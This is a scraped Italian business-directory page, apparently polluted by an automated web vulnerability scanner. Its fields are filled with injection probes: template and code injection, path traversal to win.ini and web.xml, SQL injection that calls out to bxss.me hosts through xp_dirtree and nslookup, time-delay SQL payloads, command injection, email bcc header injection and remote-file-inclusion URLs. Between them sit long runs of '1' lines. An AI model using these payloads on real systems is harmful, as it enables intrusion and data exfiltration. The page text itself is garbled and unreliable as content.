4,0 basata su 2231 recenzioni
1
1
1
1
1
1
{{9999787*9999958}}
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒC|QNcb b_&5 hg ]s0QL<6L_w~[/[m{:n-.d1d?60
acux3437z1z2abcxuca3437
acu8250<s1﹥s2ʺs3ʹuca8250
19649296
1´"()&%
1
1
1
1
1
1
1
1
1
1
1
{{9999593*9999587}}
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒC|QNcb b_&5 hg ]s0QL<6L_w~[/[m{:n-.d1d?60
acux7691z1z2abcxuca7691
acu2658<s1﹥s2ʺs3ʹuca2658
19765811
1´"()&%
1
1
1
1
1
1
1
1
1
1
1
1acuavHkr8IIaP
1
1
1
1
1
1
1
1
1
{{10000475*9999620}}
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒC|QNcb b_&5 hg ]s0QL<6L_w~[/[m{:n-.d1d?60
acux4103z1z2abcxuca4103
acu6824<s1﹥s2ʺs3ʹuca6824
19232094
1´"()&%
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
12345´"´");|]*
1
12345´"´");|]*
1
12345´"´");|]*
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
WEB-INF/web.xml
WEB-INFweb.xml
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
windowswin.ini
................windowswin.ini
................windowswin.ini
/.\./.\./.\./.\./.\./.\./windows/win.ini
../../../../../../../../../../windows/win.ini
../../../../../../../../../../windows/win.ini
C:WINDOWSsystem32driversetchosts
WEB-INFweb.xml
WEB-INF/web.xml
1
1
1
1
1
................windowswin.ini
................windowswin.ini
/.\./.\./.\./.\./.\./.\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
../../../../../../../../../../windows/win.ini
C:WINDOWSsystem32driversetchosts
../../../../../../../../../../windows/win.ini
windowswin.ini
WEB-INFweb.xml
WEB-INF/web.xml
................windowswin.ini
................windowswin.ini
/.\./.\./.\./.\./.\./.\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
../../../../../../../../../../windows/win.ini
C:WINDOWSsystem32driversetchosts
../../../../../../../../../../windows/win.ini
windowswin.ini
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1;copy (select ´´) to program ´nslookup dns.sqli.
1´;copy (select ´´) to program ´nslookup dns.sqli.
514´
1||UTL_INADDR.get_host_address(´dns.´||´sqli.013405.161-5311.161.f69dc.1.bxss´||´.me´)
´||UTL_INADDR.get_host_address(´dns.´||´sqli.013405.161-5312.161.f69dc.1.bxss´||´.me´)||´
1;EXEC master..xp_dirtree ´\dns.sqli.013405.161-5313.161.f69dc.1.bxss.me´ --
1´;EXEC master..xp_dirtree ´\dns.sqli.013405.161-5314.161.f69dc.1.bxss.me´ --
1´);EXEC master..xp_dirtree ´\dns.sqli.013405.161-5315.161.f69dc.1.bxss.me´ --
-1);select pg_sleep(21); --
-1));select pg_sleep(7); --
iYzRrM7j´;select pg_sleep(7); --
GEEjycFM´);select pg_sleep(7); --
yx4rX9Jv´));select pg_sleep(7); --
1 waitfor delay ´0:0:21´ --
O5s8kaPT´; waitfor delay ´0:0:21´ --
0oftuOed´); waitfor delay ´0:0:21´ --
vNSDgj41´)); waitfor delay ´0:0:21´ --
-1;select pg_sleep(21); --
(select(0)from(select(sleep(14)))v)/*´+(select(0)from(select(sleep(14)))v)+´"+(select(0)from(select(sleep(14)))v)+"*/
-1; waitfor delay ´0:0:14´ --
-1); waitfor delay ´0:0:14´ --
-1)); waitfor delay ´0:0:14´ --
-1" OR 2+503-503-1=0+0+0+1 --
if(now()=sysdate(),sleep(14),0)/*´XOR(if(now()=sysdate(),sleep(14),0))OR´"XOR(if(now()=sysdate(),sleep(14),0))OR"*/
jdnruYFS
-1 OR 2+182-182-1=0+0+0+1 --
-1 OR 2+163-163-1=0+0+0+1
-1´ OR 2+797-797-1=0+0+0+1 --
-1´ OR 2+177-177-1=0+0+0+1 or ´ZeQrNqW9´=´
1
1
1;copy (select ´´) to program ´nslookup dns.sqli.
1´;copy (select ´´) to program ´nslookup dns.sqli.
892´
1||UTL_INADDR.get_host_address(´dns.´||´sqli.013405.161-5285.161.f69dc.1.bxss´||´.me´)
´||UTL_INADDR.get_host_address(´dns.´||´sqli.013405.161-5286.161.f69dc.1.bxss´||´.me´)||´
1;EXEC master..xp_dirtree ´\dns.sqli.013405.161-5287.161.f69dc.1.bxss.me´ --
1´;EXEC master..xp_dirtree ´\dns.sqli.013405.161-5288.161.f69dc.1.bxss.me´ --
1´);EXEC master..xp_dirtree ´\dns.sqli.013405.161-5289.161.f69dc.1.bxss.me´ --
-1);select pg_sleep(10); --
-1));select pg_sleep(15); --
pl8FZWOs´;select pg_sleep(15); --
xoPZAzw8´);select pg_sleep(15); --
x97X4orL´));select pg_sleep(5); --
xCnu9mwm´); waitfor delay ´0:0:5´ --
QmGfDHFr´)); waitfor delay ´0:0:10´ --
-1;select pg_sleep(10); --
-1; waitfor delay ´0:0:15´ --
-1); waitfor delay ´0:0:15´ --
-1)); waitfor delay ´0:0:15´ --
1 waitfor delay ´0:0:5´ --
fJumbBZy´; waitfor delay ´0:0:5´ --
-1´ OR 2+800-800-1=0+0+0+1 or ´kmlM8u9U´=´
-1" OR 2+790-790-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)/*´XOR(if(now()=sysdate(),sleep(15),0))OR´"XOR(if(now()=sysdate(),sleep(15),0))OR"*/
(select(0)from(select(sleep(15)))v)/*´+(select(0)from(select(sleep(15)))v)+´"+(select(0)from(select(sleep(15)))v)+"*/
qaEi7VBF
-1 OR 2+706-706-1=0+0+0+1 --
-1 OR 2+731-731-1=0+0+0+1
-1´ OR 2+309-309-1=0+0+0+1 --
1
1
1´;EXEC master..xp_dirtree ´\dns.sqli.013405.161-5232.161.f69dc.1.bxss.me´ --
1´);EXEC master..xp_dirtree ´\dns.sqli.013405.161-5236.161.f69dc.1.bxss.me´ --
1;copy (select ´´) to program ´nslookup dns.sqli.
1´;copy (select ´´) to program ´nslookup dns.sqli.
359´
k6yR7DpR´);select pg_sleep(6); --
ZgFTkNkm´));select pg_sleep(6); --
1||UTL_INADDR.get_host_address(´dns.´||´sqli.013405.161-5220.161.f69dc.1.bxss´||´.me´)
´||UTL_INADDR.get_host_address(´dns.´||´sqli.013405.161-5224.161.f69dc.1.bxss´||´.me´)||´
1;EXEC master..xp_dirtree ´\dns.sqli.013405.161-5226.161.f69dc.1.bxss.me´ --
-1));select pg_sleep(3); --
ndY3EwrI´;select pg_sleep(3); --
4eIbkUjG´); waitfor delay ´0:0:6´ --
y2eHFxV8´)); waitfor delay ´0:0:9´ --
-1;select pg_sleep(9); --
-1);select pg_sleep(3); --
-1; waitfor delay ´0:0:3´ --
-1); waitfor delay ´0:0:3´ --
-1)); waitfor delay ´0:0:3´ --
1 waitfor delay ´0:0:6´ --
LLEW3o7C´; waitfor delay ´0:0:6´ --
-1" OR 2+443-443-1=0+0+0+1 --
if(now()=sysdate(),sleep(9),0)/*´XOR(if(now()=sysdate(),sleep(9),0))OR´"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
(select(0)from(select(sleep(3)))v)/*´+(select(0)from(select(sleep(3)))v)+´"+(select(0)from(select(sleep(3)))v)+"*/
-1 OR 2+903-903-1=0+0+0+1 --
-1 OR 2+553-553-1=0+0+0+1
-1´ OR 2+328-328-1=0+0+0+1 --
-1´ OR 2+45-45-1=0+0+0+1 or ´87VpeZ6m´=´
1
1
9IaiOPJe
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1´"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
/www.vulnweb.com
1
1
/www.vulnweb.com
/www.vulnweb.com
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
´"
1
1
1
1
1
1
´"
1
1
´"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
azienda.asp/.
1
1
azienda.asp
azienda.asp
1
1
azienda.asp
azienda.asp
azienda.asp/.
1
1
1
azienda.asp
1
azienda.asp/.
1
1
1
1
1
1
azienda.asp
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1
1
1
´;print(md5(acunetix_wvs_security_test));$a=´
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
1
;print(md5(acunetix_wvs_security_test));
1
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
http://hitS835ujftEI.bxss.me/
;print(md5(acunetix_wvs_security_test));
´;print(md5(acunetix_wvs_security_test));$a=´
1
http://hitxGR10S28PQ.bxss.me/
http://hitzhhqThbY1t.bxss.me/
${@print(md5(acunetix_wvs_security_test))}
1
1
;print(md5(acunetix_wvs_security_test));
´;print(md5(acunetix_wvs_security_test));$a=´
";print(md5(acunetix_wvs_security_test));$a="
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
^(#$!@#$)(()))******
1
1
1
)
!(()&&!|*|*|
1
)
1
!(()&&!|*|*|
^(#$!@#$)(()))******
1
^(#$!@#$)(()))******
1
1
1
)
!(()&&!|*|*|
1
1
Http://testasp.vulnweb.com/t/fit.txt
http://testasp.vulnweb.com/t/fit.txt?.jpg
testasp.vulnweb.com
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name
http://testasp.vulnweb.com/t/fit.txt?.jpg
testasp.vulnweb.com
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name
Http://testasp.vulnweb.com/t/fit.txt
1some_inexistent_file_with_long_name
Http://testasp.vulnweb.com/t/fit.txt
http://testasp.vulnweb.com/t/fit.txt?.jpg
testasp.vulnweb.com
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
´"()
1
1
1
1
´"()
´"()
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
1
1
1
1
1
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1 bcc:013405.161-2837.161.f69dc.1@bxss.me
to@example.com> bcc:013405.161-2839.161.f69dc.1@bxss.me
1
1 bcc:013405.161-2830.161.f69dc.1@bxss.me
to@example.com> bcc:013405.161-2832.161.f69dc.1@bxss.me
1&n974151=v910560
to@example.com> bcc:013405.161-2826.161.f69dc.1@bxss.me
1
1 bcc:013405.161-2824.161.f69dc.1@bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
set|set&set
$(nslookup dns.ce.
&nslookup dns.ce.
1
1
1
1
set|set&set
$(nslookup dns.ce.
&nslookup dns.ce.
set|set&set
$(nslookup dns.ce.
1
&nslookup dns.ce.
1
1
${10000139+9999269}
1
1
1
1
1
${10000272+9999204}
${9999767+9999040}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
IBxmQyk6
1
1
1
FVY0DCkT
Y9RFPPJV
"+response.write(9015676*9438550)+"
1´>">
1
1´>">
response.write(9169220*9329153)
´+response.write(9169220*9329153)+´
"+response.write(9169220*9329153)+"
response.write(9759933*9787724)
´+response.write(9759933*9787724)+´
"+response.write(9759933*9787724)+"
1
1´>">
response.write(9015676*9438550)
´+response.write(9015676*9438550)+´
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
P.Iva
Codice Fiscale
Telefono
Cellulare
© 2025 | Ideato e Curato dall'Associazione Studio Imprese - C.F.: 97251520827 - P.Iva: 06054990822 | Privacy Policy